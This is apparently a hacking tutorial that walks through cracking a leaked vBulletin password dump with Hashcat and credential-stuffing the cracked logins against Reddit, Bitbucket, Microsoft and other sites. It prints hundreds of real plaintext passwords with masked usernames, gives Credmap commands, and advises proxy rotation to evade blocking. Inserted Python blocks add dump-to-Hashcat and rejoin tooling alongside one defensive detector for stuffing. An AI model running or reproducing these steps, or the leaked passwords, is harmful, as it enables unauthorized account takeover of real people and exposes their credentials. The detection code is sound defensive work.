How to Hack 200 Online User Accounts in Less Than 2 Hours (From Sites Like Twitter, Reddit & Microsoft)

Jul 7, 2018 12:23 AM
Jun 1, 2019 07:13 PM

Leaked databases get passed around the internet and no one seems to notice. We've become desensitized to the data breaches that occur on a daily basis because it happens so frequently. Join me as I illustrate why reusing passwords across multiple websites is a truly awful practice — and compromise hundreds of social media accounts in the process.

In a recent survey by LastPass, it was disclosed that:

More than 53% of the respondents confessed to not changing their passwords in the past 12 months ... despite news of a data breach involving password compromise.

People simply don't care to better protect their online identities and undervalue their worth to hackers. I became curious to know (realistically) how many online accounts an attacker would be able to compromise from a single data breach, so I began to scour the open internet for leaked databases.

Step 1: Picking the Candidate

When deciding on a breach to investigate, I wanted a recent dataset that would allow for an accurate understanding of how far an attacker can get. I settled on a small gaming website which suffered a data breach in 2017 and had their entire SQL database leaked. To protect the users and their identities, I won't name the website or disclose any of the email addresses found in the leak.

The dataset consisted of roughly 1,100 unique e-mail addresses, usernames, hashed passwords, salts, and user IP addresses, separated by colons in the following format.

email:username:hashed_password:salt:ip_address

Step 2: Cracking the Hashes

Password hashing is designed to act as a one-way function: an operation that is cheap to perform but infeasible to reverse. It is not encryption; there is no key that turns a hash back into the password. Cracking therefore means guessing candidate passwords, hashing each one exactly the way the site did (same algorithm, same salt), and comparing the result with the leaked hash: a match reveals that user's password. For this I used the well-known hash cracking tool Hashcat.

Created by Jens "atom" Steube, Hashcat describes itself as the world's fastest and most advanced password recovery utility. It supports over 200 highly optimized hash types, including NetNTLMv2, LastPass, WPA/WPA2, and vBulletin, the scheme used by the gaming dataset I chose. Unlike Aircrack-ng, Hashcat is built around GPU-based password guessing, which is orders of magnitude faster than CPU-based cracking.

Step 3: Putting Brute-Force Attacks into Perspective

Many Null Byte regulars would have likely tried cracking a WPA2 handshake at some point in recent years. To give readers some idea of how much faster GPU-based brute-force attacks are compared to CPU-based attacks, below is an Aircrack-ng benchmark (-S) against WPA2 keys using an Intel i7 CPU found in most modern laptops.

aircrack-ng -S

8560 k/s

That's 8,560 WPA2 password attempts per second. To someone unfamiliar with brute-force attacks, that might seem like a lot. But here's a Hashcat benchmark (-b) against WPA2 hashes (-m 2500) using a basic AMD GPU:

hashcat -b -m 2500

hashcat (v4.1.0) starting in benchmark mode...

Hashmode: 2500 - WPA/WPA2 (Iterations: 4096)

Speed.Dev.#1.....:   155.6 kH/s (417.48ms) @ Accel:128 Loops:256 Thr:256 Vec:1

155.6 kH/s is 155,600 password attempts per second, about 18 times the i7 figure above. Imagine 18 Intel i7 CPUs brute-forcing the same hash simultaneously; that is how fast one modest GPU can be.

Not all hashing schemes provide the same degree of protection; in fact, most provide very poor protection against offline guessing. WPA2 derives its key with 4,096 PBKDF2 iterations (the "Iterations: 4096" in the benchmark output above), so every guess costs thousands of hash operations. vBulletin, a popular forum platform, stores passwords as md5(md5(password) + salt): two MD5 computations per guess. After discovering that the dataset of 1,100 hashed passwords used vBulletin's scheme, I ran the Hashcat benchmark again using the corresponding (-m 2711, vBulletin >= v3.8.5) hashmode:

hashcat -b -m 2711

hashcat (v4.1.0) starting in benchmark mode...

Hashmode: 2711 - vBulletin >= v3.8.5

Speed.Dev.#1.....:  1949.6 MH/s (274.43ms) @ Accel:128 Loops:512 Thr:256 Vec:1

That's an estimated 1,949,600,000 (~2 billion) password attempts per second. Hopefully, this illustrates just how easy it is for anyone with a modern GPU to crack hashes after a database has leaked.

Step 4: Brute-Forcing the Hashes

The raw SQL dump contained fields that play no part in cracking, such as the e-mail and IP addresses. The hashes and salts were extracted into the hash:salt input format Hashcat expects for this mode.

hashed_password:salt

The hashed passwords were then fed into Hashcat using the following command.

hashcat -a 0 -m 2711 ~/leaks/hashes/dataset.hashes ~/wordlists/wordlist.txt -w 4 --potfile-path ~/pots/dataset.potfile

The dictionary attack, or "straight mode," is selected with -a 0: every word in the wordlist is hashed with each salt and compared against the targets. To maximise cracking speed I generally set -w (--workload-profile) to 4, which dedicates the GPU to Hashcat and leaves the desktop unresponsive while it runs. Finally, --potfile-path saves the cracked hashes (as hash:salt:plaintext) to the specified file.

After trying dozens of wordlists containing hundreds of millions of passwords against the dataset, I was able to crack roughly 330 (30%) of the 1,100 hashes in less than an hour. Still a bit unsatisfied, I tried more of Hashcat's brute-forcing features:

hashcat -a 3 -m 2711 ~/leaks/hashes/dataset.hashes ?l?l?l?l?l?l?d?d -w 4 --potfile-path ~/pots/dataset.potfile

Here I'm using Hashcat's mask attack (-a 3) to try every six-character lowercase string (?l) followed by two digits (?d): a keyspace of 26^6 × 10^2, about 30.9 billion candidates, which a GPU making roughly 2 billion guesses per second exhausts quickly. This attempt also completed in a relatively short time and cracked over 100 more hashes, bringing the total to exactly 475, roughly 43% of the 1,100 dataset.
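To put the benchmark figures and the mask above in the same units, here is an added example (not part of the original article and not hashcat's own code): a small Python estimator for the keyspace of a hashcat mask and the time needed to exhaust it at each quoted speed. The charset sizes are hashcat's documented built-in ones; the speeds are the article's three benchmark numbers converted to hashes per second; the `salts` parameter and the function names are this example's own.

```python
"""Added example: keyspace and run-time estimates for a hashcat mask at the
benchmark speeds quoted in the article (8,560 H/s, 155.6 kH/s, 1949.6 MH/s).
Charset sizes are hashcat's built-in ones; everything else is arithmetic."""

# Size of each built-in hashcat charset.
CHARSETS = {
    "l": 26,   # ?l  a-z
    "u": 26,   # ?u  A-Z
    "d": 10,   # ?d  0-9
    "h": 16,   # ?h  0-9a-f
    "H": 16,   # ?H  0-9A-F
    "s": 33,   # ?s  space plus the 32 printable ASCII punctuation characters
    "a": 95,   # ?a  ?l?u?d?s
    "b": 256,  # ?b  every byte 0x00-0xff
}

# The article's benchmarks, in hashes per second.
SPEEDS = {
    "WPA2, i7 CPU (aircrack-ng -S)": 8_560,
    "WPA2, AMD GPU (hashcat -m 2500)": 155_600,
    "vBulletin, same GPU (hashcat -m 2711)": 1_949_600_000,
}


def mask_keyspace(mask: str) -> int:
    """Candidates a hashcat mask generates. Literal characters count as one
    and '??' is a literal question mark, as in hashcat."""
    total, i = 1, 0
    while i < len(mask):
        if mask[i] != "?":
            i += 1
            continue
        if i + 1 == len(mask):
            raise ValueError("mask ends with a lone '?'")
        token = mask[i + 1]
        if token == "?":
            size = 1
        elif token in CHARSETS:
            size = CHARSETS[token]
        else:
            raise ValueError(f"unknown charset ?{token}")
        total *= size
        i += 2
    return total


def seconds_to_exhaust(mask: str, hashes_per_second: float, salts: int = 1) -> float:
    """Worst-case time to run the whole mask. hashcat tries each candidate
    against every salt in the list, so a salted list costs `salts` times more."""
    return mask_keyspace(mask) * salts / hashes_per_second


def human(seconds: float) -> str:
    """Readable duration for the table."""
    for unit, size in (("days", 86_400), ("hours", 3_600), ("minutes", 60)):
        if seconds >= size:
            return f"{seconds / size:.1f} {unit}"
    return f"{seconds:.1f} seconds"


def table(masks=("?l?l?l?l?l?l?d?d", "?u?l?l?l?l?l?d?d", "?a?a?a?a?a?a?a?a"), salts: int = 1):
    """Seconds to exhaust each mask at each benchmark speed."""
    return {m: {name: seconds_to_exhaust(m, hps, salts) for name, hps in SPEEDS.items()}
            for m in masks}


if __name__ == "__main__":
    for mask, rows in table().items():
        print(f"{mask}  keyspace={mask_keyspace(mask):,}")
        for name, secs in rows.items():
            print(f"  {name:40} {human(secs)}")
```

With the article's numbers the six-lowercase-plus-two-digit mask is about 30.9 billion candidates: around 16 seconds against a single vBulletin hash at 1.95 GH/s, about 2.3 days at the GPU's WPA2 rate, and about 42 days at the CPU's WPA2 rate. One caveat for salted lists: hashcat has to try each candidate against every salt still uncracked, so against the roughly 1,100 distinct salts in this dump the same mask costs on the order of five GPU hours, which is what `salts=1100` reports.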

After rejoining the cracked hashes with their corresponding email address, I was left with 475 lines of the following dataset.

******@web.de:Sodium60
******@phaphach.com:Xi@oxiao123
*****@hotmail.nl:rockybalboa
********@gmail.com:ariel420
*******@HOTMAIL.COM:SLOANE01
******@paul198112.plus.com:creative
*******@hotmail.com:67thdtR8nP
******@gmail.com:bullets
*****@terra.com.mx:590416
******@gmail.com:juan930122
*******@aol.de:Madison1990
******@verizon.net:entropy33
*****@gmail.com:flyboy21
*******@gmail.com:rat7
********@jacks.sdstate.edu:entern0w
******@gmail.com:pookieg
******@hotmail.com:kevlar11
*******@myactv.net:1oldman1
******@hotmail.com:dodgers
********@mail.ru:wodI14z2eF
*******@yahoo.de:bella1811
*****@gmail.com:jojo82
*****@hotmail.com:metalfire
*******@gmail.com:nonoobs810
******@gmail.com:bobby10
*******@gmail.com:5Zurt8q8tQ
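As an added example (not the article's own tooling, and not part of hashcat): the glue a practitioner actually writes around hashcat for Steps 1 and 4, in Python. It parses the dump layout shown in Step 1, emits the hash:salt file, reads hashcat's potfile back and rejoins each cracked password to its e-mail address, re-verifying every pair by recomputing vBulletin's md5(md5(password) + salt) first. The sample users, salts and IP addresses are constructed for the example; the 30-character salt length is vBulletin's for the >= 3.8.5 scheme that mode 2711 targets; the potfile layout assumed is hashcat's hash:salt:plaintext with $HEX[...] for plaintexts it does not print verbatim; IPv4 addresses are assumed in the last column.

```python
"""Added example (not from the article or hashcat): prepare a leaked vBulletin
dump for hashcat -m 2711 and join the cracked results back to e-mail addresses.
Assumes the article's email:username:hash:salt:ip layout with IPv4 addresses,
vBulletin >= 3.8.5 hashes (md5(md5(password) + salt), 30-character salt) and
hashcat potfile lines of hash:salt:plaintext with $HEX[...] for odd plaintexts.
All records below are constructed."""
from __future__ import annotations

import hashlib
import re
from typing import NamedTuple

SALT_LEN = 30
HEX_PLAIN = re.compile(r"^\$HEX\[([0-9a-fA-F]*)\]$")


class Record(NamedTuple):
    email: str
    username: str
    hash: str
    salt: str
    ip: str


def vbulletin_hash(password: str, salt: str) -> str:
    """md5(md5(password) + salt), the scheme hashcat mode 2711 implements."""
    inner = hashlib.md5(password.encode("utf-8")).hexdigest()
    return hashlib.md5((inner + salt).encode("utf-8")).hexdigest()


def parse_dump(text: str) -> list[Record]:
    """Split fixed fields off both ends: a vBulletin salt may itself contain ':'."""
    records = []
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        try:
            email, username, rest = line.split(":", 2)
            rest, ip = rest.rsplit(":", 1)
        except ValueError:
            raise ValueError(f"line {n}: expected email:username:hash:salt:ip") from None
        digest, _, salt = rest.partition(":")   # the hash is hex, so no ':' before here
        if not re.fullmatch(r"[0-9a-f]{32}", digest) or len(salt) != SALT_LEN:
            raise ValueError(f"line {n}: not a vBulletin >= 3.8.5 hash:salt pair")
        records.append(Record(email, username, digest, salt, ip))
    return records


def hashcat_input(records: list[Record]) -> str:
    """The hash:salt file handed to hashcat, one line per distinct pair."""
    return "".join(f"{h}:{s}\n" for h, s in sorted({(r.hash, r.salt) for r in records}))


def decode_plain(field: str) -> str:
    """Undo hashcat's $HEX[...] encoding of the plaintext column."""
    m = HEX_PLAIN.match(field)
    return bytes.fromhex(m.group(1)).decode("utf-8", "replace") if m else field


def parse_potfile(text: str) -> dict[tuple[str, str], str]:
    """hash:salt:plain -> {(hash, salt): plain}. With a fixed salt length the
    plaintext is everything after column 64, even if it contains ':' itself."""
    cracked = {}
    for line in text.splitlines():
        if not line:
            continue
        if len(line) < 34 + SALT_LEN or line[32] != ":" or line[33 + SALT_LEN] != ":":
            raise ValueError(f"malformed potfile line: {line!r}")
        cracked[(line[:32], line[33:33 + SALT_LEN])] = decode_plain(line[34 + SALT_LEN:])
    return cracked


def rejoin(records: list[Record], cracked: dict[tuple[str, str], str]) -> list[str]:
    """email:password for each cracked record, re-verifying the plaintext against
    the record's own salt so a bad potfile line is never pinned on the wrong user."""
    out = []
    for r in records:
        plain = cracked.get((r.hash, r.salt))
        if plain is None:
            continue
        if vbulletin_hash(plain, r.salt) != r.hash:
            raise ValueError(f"potfile plaintext does not verify for {r.email}")
        out.append(f"{r.email}:{plain}")
    return out


# Constructed users; the dump is produced exactly as the forum would have stored
# it, and alice's salt deliberately contains ':'.
_USERS = [
    ("alice@example.com", "alice", "Sodium60", "K3n:9vZq!xT2pL8mRw4sBd6yHg0cFa", "203.0.113.10"),
    ("bob@example.net", "bob", "rockybalboa", "m5Xq2Lw8Zt4Ns7Cv1Bg3Hk6Yp9Rd0F", "198.51.100.7"),
    ("carol@example.org", "carol", "pookieg", "Q1w2E3r4T5y6U7i8O9p0A1s2D3f4G5", "192.0.2.44"),
]
SAMPLE_DUMP = "".join(f"{e}:{u}:{vbulletin_hash(p, s)}:{s}:{ip}\n" for e, u, p, s, ip in _USERS)
# What hashcat would leave in --potfile-path after cracking alice and bob (carol
# stays uncracked); alice's plaintext is written the $HEX[] way.
SAMPLE_POTFILE = (
    f"{vbulletin_hash('Sodium60', _USERS[0][3])}:{_USERS[0][3]}:$HEX[{'Sodium60'.encode().hex()}]\n"
    f"{vbulletin_hash('rockybalboa', _USERS[1][3])}:{_USERS[1][3]}:rockybalboa\n"
)


def run_example() -> tuple[str, list[str]]:
    """Dump -> hashcat input file, and potfile -> email:password lines."""
    records = parse_dump(SAMPLE_DUMP)
    return hashcat_input(records), rejoin(records, parse_potfile(SAMPLE_POTFILE))
```

`run_example()` returns the text you would write to the file passed to `hashcat -m 2711` and the rejoined `email:password` list for the cracked users. The re-verification in `rejoin` is cheap (two MD5s per line) and catches the mistakes that produce embarrassing false hits later: a potfile from a different run, a different mode, or a hand-edited line.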

Step 5: Checking for Password Reuse

As I mentioned, this dataset was leaked from a small, unknown gaming website. Selling these gaming accounts would produce very little value to a hacker. The value is in how often these users reused their username, email, and password across other popular websites.

To figure that out, Credmap and Shard were used to automate the detection of password reuse. These tools are quite similar but I decided to feature both because their findings were different in a few ways which are detailed later in this article.

Option 1: Using Credmap

Credmap is a Python script and requires no dependencies. Simply clone the GitHub repository and change into the credmap/ directory to start using it.

git clone https://github.com/lightos/credmap
cd credmap

The --list argument can be used to view the websites Credmap currently supports.

./credmap.py --list

               . .IIIII             .II
  I123456IIII. I  II  .    II..IIIIIIIIIIIIIIIIIIII
 .  .IIIIII  II             IIIIIIHUNTER2IIIII  I.
    .IIIII.III I        IIIIIIIIIIIIIIIIIIIIIII
   .IILOVEII           II  .IIIII IIIIIIIIIIII. I
    IIIIII             IIII I  IISECRETIIIIIII I
    .II               IIIIIIIIIIIII  IIIIIIIII
       I.           .IIIABC123IIII    I   II  I
         .IIII        IIIIIIIIIIII     .       I
          IIIII.          IIIIII           . I.
          IIGODIII         IIIII             ..I  II .
           IIIIII          IIII...             IIII
            IIII           III. I            IISEXII
            III             I                I  III
            II                                   I   .
             I

credmap v0.1-d862247 (https://github.com/lightos/credmap/)

- scribd.com
- en.wikipedia.org
- stackoverflow.com
- digitalocean.com
- yahoo.com
- linkedin.com
- wunderlist.com
- bitbucket.org
- twitter.com
- amazon.com
- ebay.com
- groupon.com
- soundcloud.com
- spotify.com
- airbnb.com
- live.com
- imgur.com
- foursquare.com
- pinterest.com
- instagram.com
- trakt.tv
- yelp.com
- github.com
- pastebin.com
- facebook.com
- reddit.com
- zoho.com
- vimeo.com

The --load argument reads a file of credentials, by default one "username:password" pair per line. Credmap also accepts a "username|email:password" layout for websites that only accept an e-mail address as the login name; that layout is selected with --format "u|e:p".

./credmap.py --load ~/leaks/cracked/dataset_user_email_pass_combos.txt --format "u|e:p" --exclude "groupon.com, instagram.com"

During my tests, both Groupon and Instagram blocked or blacklisted my VPS's IP address after a few minutes of Credmap traffic, no doubt because of dozens of failed logins from one address in a short period. I omitted those sites with --exclude, but a motivated attacker can route each attempt through a different proxy or VPN exit and throttle the request rate, which defeats any detection that keys only on failures per source address.
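The paragraph above describes the evasion; as an added example (not from the article), here is what a site's own detection looks like from the log side, in Python over constructed authentication log lines. A password-reuse run makes one or two attempts against many accounts, the opposite shape of a brute force against one account, so the first detector keys on distinct usernames per source address, and the second on distinct accounts failing site-wide, which still fires when an attacker rotates addresses per attempt. The log format, thresholds, addresses and usernames are all constructed for this example.

```python
"""Added example (not from the article): spotting a credential-stuffing run in
authentication logs. detect_per_ip flags one source spraying many accounts;
detect_global counts distinct accounts failing site-wide inside the window and
still fires when every attempt arrives from a different address.
The log format and every sample line below are constructed."""
from __future__ import annotations

from collections import defaultdict, deque
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=10)
PER_IP_MIN_ACCOUNTS = 5         # distinct usernames one source must touch ...
PER_IP_FAIL_RATIO = 0.8         # ... with at least this share of failures
GLOBAL_MIN_FAILED_ACCOUNTS = 8  # distinct accounts failing site-wide in the window


def parse_line(line: str) -> tuple[datetime, str, str, bool]:
    """Constructed format: '<iso8601> <src_ip> login user=<name> result=<ok|fail>'."""
    ts, ip, event, user_kv, result_kv = line.split()
    if event != "login" or not user_kv.startswith("user=") or not result_kv.startswith("result="):
        raise ValueError(f"unexpected log line: {line!r}")
    when = datetime.fromisoformat(ts.replace("Z", "+00:00"))
    return when, ip, user_kv[5:], result_kv[7:] == "ok"


def detect_per_ip(events, window=WINDOW, min_accounts=PER_IP_MIN_ACCOUNTS,
                  fail_ratio=PER_IP_FAIL_RATIO) -> dict[str, dict]:
    """Flag sources that spray many accounts with mostly failing attempts.
    Returns {ip: details} with the first moment each source crossed the line."""
    recent: dict[str, deque] = defaultdict(deque)
    alerts: dict[str, dict] = {}
    for when, ip, user, ok in sorted(events):
        q = recent[ip]
        q.append((when, user, ok))
        while when - q[0][0] > window:      # slide the window forward
            q.popleft()
        accounts = {u for _, u, _ in q}
        failures = sum(1 for _, _, k in q if not k)
        if ip not in alerts and len(accounts) >= min_accounts and failures / len(q) >= fail_ratio:
            alerts[ip] = {"at": when, "accounts": len(accounts),
                          "attempts": len(q), "failures": failures}
    return alerts


def detect_global(events, window=WINDOW, min_failed=GLOBAL_MIN_FAILED_ACCOUNTS) -> dict | None:
    """Flag a burst of distinct accounts failing site-wide, whatever the sources.
    Per-attempt proxy rotation evades detect_per_ip but not this."""
    q: deque = deque()
    for when, ip, user, ok in sorted(events):
        if ok:
            continue
        q.append((when, ip, user))
        while when - q[0][0] > window:
            q.popleft()
        accounts = {u for _, _, u in q}
        if len(accounts) >= min_failed:
            return {"at": when, "failed_accounts": len(accounts),
                    "sources": len({i for _, i, _ in q})}
    return None


# Constructed log. dave is a forgetful user retrying his own account;
# 203.0.113.5 sprays six accounts from one address and lands one;
# 203.0.113.61-68 is the same campaign with a fresh address per attempt.
SAMPLE_LOG = """\
2018-07-07T00:00:05Z 198.51.100.7 login user=dave result=fail
2018-07-07T00:00:20Z 198.51.100.7 login user=dave result=fail
2018-07-07T00:00:41Z 198.51.100.7 login user=dave result=ok
2018-07-07T00:01:00Z 203.0.113.5 login user=alice result=fail
2018-07-07T00:01:02Z 203.0.113.5 login user=bob result=fail
2018-07-07T00:01:04Z 203.0.113.5 login user=carol result=ok
2018-07-07T00:01:06Z 203.0.113.5 login user=erin result=fail
2018-07-07T00:01:08Z 203.0.113.5 login user=frank result=fail
2018-07-07T00:01:10Z 203.0.113.5 login user=grace result=fail
2018-07-07T00:02:30Z 192.0.2.10 login user=heidi result=ok
2018-07-07T00:30:00Z 203.0.113.61 login user=ivan result=fail
2018-07-07T00:30:09Z 203.0.113.62 login user=judy result=fail
2018-07-07T00:30:18Z 203.0.113.63 login user=ken result=fail
2018-07-07T00:30:27Z 203.0.113.64 login user=lena result=fail
2018-07-07T00:30:36Z 203.0.113.65 login user=mallory result=fail
2018-07-07T00:30:45Z 203.0.113.66 login user=niaj result=fail
2018-07-07T00:30:54Z 203.0.113.67 login user=olivia result=fail
2018-07-07T00:31:03Z 203.0.113.68 login user=peggy result=fail
"""


def analyze(log_text: str):
    """Run both detectors over a log; returns (per-ip alerts, global alert)."""
    events = [parse_line(l) for l in log_text.splitlines() if l.strip()]
    return detect_per_ip(events), detect_global(events)
```

On the sample, `detect_per_ip` flags 203.0.113.5 after its fifth attempt (five accounts, four failures) and never flags dave, whose three attempts all hit one account. The rotated burst at 00:30 produces no per-address alert at all, which is exactly the evasion the paragraph above describes, and only `detect_global` catches it, at the eighth distinct failing account. In production the global threshold has to be set against the site's normal failure baseline, and both detectors are worth pairing with a rule on "first-ever login from this address succeeds on the first try", the fingerprint of a correct reused password.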

The results of the Credmap command were surprising:

[********:9v6Zyl1heT] on "Bitbucket"...
[********:allus82] on "Reddit"...
[********:Jesus4ever] on "Reddit"...
[********:Jesus4ever] on "Bitbucket"...
[********:s4mb4lb1J] on "Bitbucket"...
[********:xjsv12] on "Bitbucket"...
[********:rosied] on "Bitbucket"...
[********:xbox360] on "Microsoft Live Account"...
[********:seventeen17] on "Bitbucket"...
[********:starwars] on "Scribd"...
[********:Presario123] on "Bitbucket"...
[********:podpod] on "Bitbucket"...
[********:podpod] on "Microsoft Live Account"...
[********:for795] on "Bitbucket"...
[********:isbandia] on "Wikipedia"...
[********:isbandia] on "Bitbucket"...
[********:wtEq5n22aH] on "Scribd"...
[********:240sxse] on "Reddit"...
[********:warhammer40k5] on "Bitbucket"...
[********:abeeagle] on "Reddit"...
[********:99bottles] on "Reddit"...
[********:99bottles] on "Wunderlist"...
[********:99bottles] on "Microsoft Live Account"...
[********:Checkers12] on "Reddit"...
[********:Checkers12] on "Bitbucket"...
[********:morgan13] on "Pinterest"...
[********:greencar.] on "Microsoft Live Account"...
[********:Warzone1] on "Bitbucket"...
[********:o83bjJ1rzQ] on "Bitbucket"...
[********:kajfarik] on "Foursquare"...
[********:kajfarik] on "Bitbucket"...
[********:1324Michael1324] on "Reddit"...
[********:max1mili0n] on "Microsoft Live Account"...
[********:s8elpz7c] on "Microsoft Live Account"...
[********:hitman] on "Reddit"...
[********:u9Q98rtikC] on "Bitbucket"...
[********:ab1g0r] on "Bitbucket"...
[********:stingray951] on "Bitbucket"...
[********:tard] on "Bitbucket"...
[********:Pumpkin007] on "Bitbucket"...
[********:h8802123] on "Reddit"...
[********:ownership1] on "Bitbucket"...
[********:N289wewtzF] on "Bitbucket"...
[********:Hummer1234] on "Bitbucket"...
[********:igniter123] on "Reddit"...
[********:167706] on "Bitbucket"...
[********:12341234] on "Bitbucket"...
[********:sniper] on "Bitbucket"...
[********:1212111] on "Bitbucket"...
[********:element1] on "Bitbucket"...
[********:mrb1087410] on "Bitbucket"...
[********:3k3f6wJxnK] on "Bitbucket"...
[********:spy929] on "Bitbucket"...
[********:qy913zdXpN] on "Bitbucket"...
[********:E5jnhui83D] on "Bitbucket"...
[********:6qfu6oeI8V] on "Bitbucket"...
[********:Nd9nw88grB] on "Scribd"...
[********:REGan181] on "Bitbucket"...
[********:skuli2779] on "Scribd"...
[********:phalanx1] on "Foursquare"...
[********:ariel420] on "Microsoft Live Account"...
[********:SLOANE01] on "Bitbucket"...
[********:67thdtR8nP] on "Scribd"...
[********:bullets] on "Bitbucket"...
[********:flyboy21] on "Wunderlist"...
[********:pookieg] on "Reddit"...
[********:bella1811] on "Reddit"...
[********:jojo82] on "Foursquare"...
[********:nonoobs810] on "Microsoft Live Account"...
[********:maxima1231] on "Reddit"...
[********:maxima1231] on "Pinterest"...
[********:ai7o8Z8vxO] on "Scribd"...
[********:mustang1] on "Reddit"...
[********:M.ustang9939] on "Bitbucket"...
[********:Balingwenwen123] on "Bitbucket"...
[********:dragao] on "Bitbucket"...
[********:7egixeO38Q] on "Scribd"...
[********:astonm] on "Bitbucket"...
[********:Nascar2405] on "Foursquare"...
[********:Nascar2405] on "Microsoft Live Account"...
[********:carrie0530] on "Reddit"...
[********:F85wdvq3kX] on "Bitbucket"...
[********:A2w9taks7L] on "Scribd"...
[********:A2w9taks7L] on "Linkedin"...
[********:Hxopz542] on "Reddit"...
[********:hd070800] on "Pinterest"...
[********:hd070800] on "Bitbucket"...
[********:piper1956] on "Bitbucket"...
[********:123123qweqwe] on "Reddit"...
[********:xboxlive] on "Reddit"...
[********:xboxlive] on "Pinterest"...
[********:Xi%40oxiao123] on "Bitbucket"...
[********:metallica12] on "Bitbucket"...
[********:sianlaser12] on "Pinterest"...
[********:h8ep81knFR] on "Reddit"...
[********:plummer92] on "Reddit"...
[********:plummer92] on "Bitbucket"...
[********:8246jt] on "Reddit"...
[********:8246jt] on "Scribd"...
[********:271bEzxonZ] on "Bitbucket"...
[********:6911747] on "Scribd"...
[********:6911747] on "Bitbucket"...
[********:raejas11] on "Bitbucket"...
[********:d0bb3lts4lt0] on "Microsoft Live Account"...
[********:2yvpdl13CP] on "Scribd"...
[********:dodgers123] on "Bitbucket"...
[********:urbanus] on "Reddit"...
[********:0506571670] on "Foursquare"...
[********:gyqK8Giz1P] on "Bitbucket"...
[********:e6bnvVo67H] on "Bitbucket"...
[********:92k2cizCdP] on "Scribd"...
[********:drnCy43g4O] on "Reddit"...
[********:Ayrtonsenna1] on "Bitbucket"...
[********:aerielle] on "Microsoft Live Account"...
[********:12341234a] on "Reddit"...
[********:6Ibit6qp1F] on "Bitbucket"...
[********:5n6xcd6rPD] on "Scribd"...
[********:5n6xcd6rPD] on "Bitbucket"...
[********:Redalert1] on "Bitbucket"...
[********:2689874] on "Scribd"...
[********:2689874] on "Pinterest"...
[********:bma81092] on "Reddit"...
[********:bma81092] on "Bitbucket"...
[********:csibi2007] on "Reddit"...
[********:alterego] on "Bitbucket"...
[********:tournament] on "Bitbucket"...
[********:Lena2020] on "Pinterest"...
[********:Lena2020] on "Bitbucket"...
[********:alejandro] on "Scribd"...
[********:alejandro] on "Bitbucket"...
[********:Imtr0uble] on "Bitbucket"...
[********:sucette] on "Bitbucket"...
[********:pipQc5p24Q] on "Bitbucket"...
[********:moomoo] on "Pinterest"...
[********:N0t3p%40D%21] on "Scribd"...
[********:N0t3p%40D%21] on "Pinterest"...
[********:7bR9bft8cQ] on "Bitbucket"...
[********:puzzle] on "Bitbucket"...
[********:spartan117] on "Microsoft Live Account"...
[********:scooby1621] on "Microsoft Live Account"...
[********:mike1828] on "Microsoft Live Account"...
[********:fifer123] on "Microsoft Live Account"...
[********:e5Bo1fx3kF] on "Scribd"...
[********:monkey] on "Reddit"...
[********:darkstar] on "Bitbucket"...
[********:irzF9k6p1H] on "Reddit"...
[********:8yu9hkwV9Q] on "Scribd"...
[********:c0mmand] on "Bitbucket"...
[********:doppler] on "Reddit"...
[********:doppler] on "Scribd"...
[********:jh5thrwgefsdfs] on "Bitbucket"...
[********:roblox12] on "Bitbucket"...
[********:aqwzsxedc] on "Bitbucket"...
[********:12345tessi] on "Bitbucket"...
[********:helmond] on "Bitbucket"...
[********:Liam1123] on "Reddit"...
[********:liptoo98] on "Scribd"...
[********:b82olSn4yH] on "Bitbucket"...
[********:bossos2] on "Microsoft Live Account"...
[********:highjump] on "Bitbucket"...
[********:juhu1230] on "Reddit"...
[********:bepolite] on "Reddit"...
[********:M00nglum] on "Microsoft Live Account"...
[********:Adw2u1h3tO] on "Bitbucket"...
[********:Manly123] on "Bitbucket"...
[********:ragnarok01] on "Reddit"...
[********:useless] on "Pinterest"...
[********:starwars97] on "Reddit"...
[********:doodle] on "Bitbucket"...
[********:TYzt2013] on "Bitbucket"...
[********:Cheese77] on "Microsoft Live Account"...
[********:voxpi384] on "Bitbucket"...
[********:allah4life] on "Reddit"...
[********:allah4life] on "Wunderlist"...
[********:Jackal67] on "Reddit"...
[********:Jackal67] on "Bitbucket"...
[********:jasmine00] on "Bitbucket"...
[********:LXfn3BG952] on "Reddit"...
[********:alfiedog12] on "Pinterest"...
[********:25262928] on "Reddit"...
[********:25262928] on "Bitbucket"...
[********:Rat_isthebest] on "Foursquare"...
[********:Rat_isthebest] on "Scribd"...
[********:Rat_isthebest] on "Bitbucket"...
[********:Rat_isthebest] on "Wunderlist"...
[********:4kg83zRltG] on "Scribd"...
[********:4kg83zRltG] on "Bitbucket"...
[********:f1scher] on "Reddit"...
[********:o23jwr8uFD] on "Reddit"...
[********:o23jwr8uFD] on "Bitbucket"...
[********:ikbengek1] on "Pinterest"...
[********:Trustno1%21] on "Bitbucket"...
[********:trudat] on "Bitbucket"...
[********:tototomy] on "Bitbucket"...
[********:qwer1234] on "Bitbucket"...
[********:1391730] on "Foursquare"...
[********:robby123] on "Scribd"...
[********:actsman7] on "Bitbucket"...
[********:whodey] on "Wunderlist"...
[********:308184rt] on "Reddit"...
[********:108Resistance] on "Bitbucket"...
[********:yilin9409] on "Scribd"...
[********:joshuavi] on "Reddit"...
[********:damnkids] on "Bitbucket"...
[********:jbncde5hn6y5] on "Bitbucket"...
[********:roblox12] on "Reddit"...
[********:roblox12] on "Bitbucket"...
[********:azerty00] on "Reddit"...
[********:azerty00] on "Pinterest"...
[********:gymkhana] on "Bitbucket"...
[********:gymkhana] on "Wunderlist"...
[********:newgame] on "Reddit"...
[********:dacheng198] on "Scribd"...
[********:123456] on "Bitbucket"...
[********:syndrom02] on "Reddit"...
[********:Paintball1] on "Bitbucket"...
[********:4536729] on "Bitbucket"...
[********:rawtheme22] on "Reddit"...
[********:rawtheme22] on "Bitbucket"...
[********:sobaked123] on "Microsoft Live Account"...
[********:Thee1234] on "Bitbucket"...
[********:sersna7] on "Bitbucket"...
[********:indonesia2016] on "Scribd"...
[********:indonesia2016] on "Microsoft Live Account"...
[********:Ou6tlgr87N] on "Scribd"...
[********:sea2shell] on "Reddit"...
[********:01cs653] on "Reddit"...
[********:73icJf3ilZ] on "Scribd"...
[********:ndyr761pGO] on "Bitbucket"...
[********:prosk8ter] on "Bitbucket"...
[********:games%21%21%21] on "Pinterest"...
[********:games%21%21%21] on "Microsoft Live Account"...
[********:gt9800] on "Bitbucket"...
[********:mel4tipp] on "Microsoft Live Account"...
[********:mvp123] on "Reddit"...
[********:mvp123] on "Bitbucket"...
[********:3g82tafLbY] on "Bitbucket"...
[********:arturi09] on "Wunderlist"...
[********:arturi09] on "Microsoft Live Account"...
[********:092486] on "Bitbucket"...
[********:sappeps12345] on "Reddit"...
[********:1morerep] on "Bitbucket"...
